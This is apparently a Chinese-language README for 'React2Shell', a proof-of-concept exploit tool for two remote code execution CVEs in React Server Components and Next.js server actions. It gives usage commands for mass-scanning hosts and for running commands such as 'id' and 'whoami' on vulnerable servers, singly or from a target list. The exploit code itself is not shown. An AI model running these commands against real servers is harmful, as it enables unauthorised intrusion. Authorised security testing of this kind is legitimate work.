针对 CVE-2025-55182 和 CVE-2025-66478 的概念验证漏洞利用程序,这两个是 React 服务端组件 (RSC) 和 Next.js 应用程序中的严重远程代码执行漏洞。
React2Shell 演示了对 Next.js 服务端操作处理程序中不安全反序列化的利用,允许未认证的攻击者通过精心构造的多部分表单数据载荷在易受攻击的服务器上执行任意命令。
scanner.py - 由 Assetnote 开发的漏洞扫描器,用于跨多个主机检测易受攻击的 Next.js/RSC 实例main.py - 直接在易受攻击目标上执行命令的 RCE 利用程序扫描单个主机:
python3 scanner.py -u https://target.com
从文件扫描多个主机:
python3 scanner.py -l targets.txt -t 20 -o results.json
在易受攻击的主机上执行命令:
python3 main.py target.com 'id'
从易受攻击主机列表中执行命令:
python3 main.py -l vulnerable.txt 'whoami'
此工具仅用于教育目的和经授权的安全测试。未经授权访问计算机系统是违法行为。